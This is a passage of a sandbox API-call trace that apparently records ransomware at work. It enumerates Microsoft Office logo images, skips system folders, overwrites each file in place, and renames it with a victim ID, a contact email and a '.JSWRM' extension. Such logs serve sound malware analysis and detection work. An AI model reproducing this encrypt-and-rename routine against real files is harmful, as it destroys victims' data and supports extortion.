Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.596] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbd1, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.contrast-black_scale-180.png", cAlternateFileName="OU86F2~1.PNG")) returned 1 [0133.596] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.596] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.596] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.596] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.596] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0133.596] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0133.596] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.596] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.596] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0133.596] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0133.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22d298, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0133.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0133.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.598] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3025) returned 1 [0133.598] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.598] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xbd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xbd0, lpOverlapped=0x0) returned 1 [0133.600] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.600] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xbd0, lpOverlapped=0x0) returned 1 [0133.600] CloseHandle (hObject=0x238) returned 1 [0133.600] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.601] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6d7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.contrast-black_scale-80.png", cAlternateFileName="OU0B51~1.PNG")) returned 1 [0133.601] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.601] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.601] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.601] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.601] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0133.601] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0133.602] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.602] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.602] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0133.602] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0133.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0133.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22d0d8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0133.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0133.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-black_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22d260, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0133.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.603] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1751) returned 1 [0133.603] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.603] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x6d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x6d0, lpOverlapped=0x0) returned 1 [0133.605] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.605] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x6d0, lpOverlapped=0x0) returned 1 [0133.605] CloseHandle (hObject=0x238) returned 1 [0133.605] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.606] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ed, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.contrast-white_scale-100.png", cAlternateFileName="OUFC89~1.PNG")) returned 1 [0133.606] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.606] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.606] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.606] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.606] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0133.606] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0133.606] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.606] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.606] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0133.606] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0133.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0133.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0133.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.607] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2029) returned 1 [0133.608] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.608] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0133.609] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.609] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0133.609] CloseHandle (hObject=0x238) returned 1 [0133.610] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.611] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8cf, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.contrast-white_scale-140.png", cAlternateFileName="OU4A1E~1.PNG")) returned 1 [0133.611] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.611] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.611] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.611] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.611] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0133.611] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0133.611] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.611] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.611] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0133.611] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0133.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0133.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0133.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.612] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2255) returned 1 [0133.612] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.612] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8c0, lpOverlapped=0x0) returned 1 [0133.614] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.614] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8c0, lpOverlapped=0x0) returned 1 [0133.614] CloseHandle (hObject=0x238) returned 1 [0133.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.615] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbe3, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogoSmall.contrast-white_scale-180.png", cAlternateFileName="OU78EB~1.PNG")) returned 1 [0133.615] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.615] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.615] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.615] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.615] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0133.615] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0133.615] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.615] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.615] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0133.615] lstrcmpiW (lpString1="OutlookLogoSmall.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0133.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0133.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0133.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.616] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3043) returned 1 [0133.616] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.616] ReadFile (in: hFile=0x238, 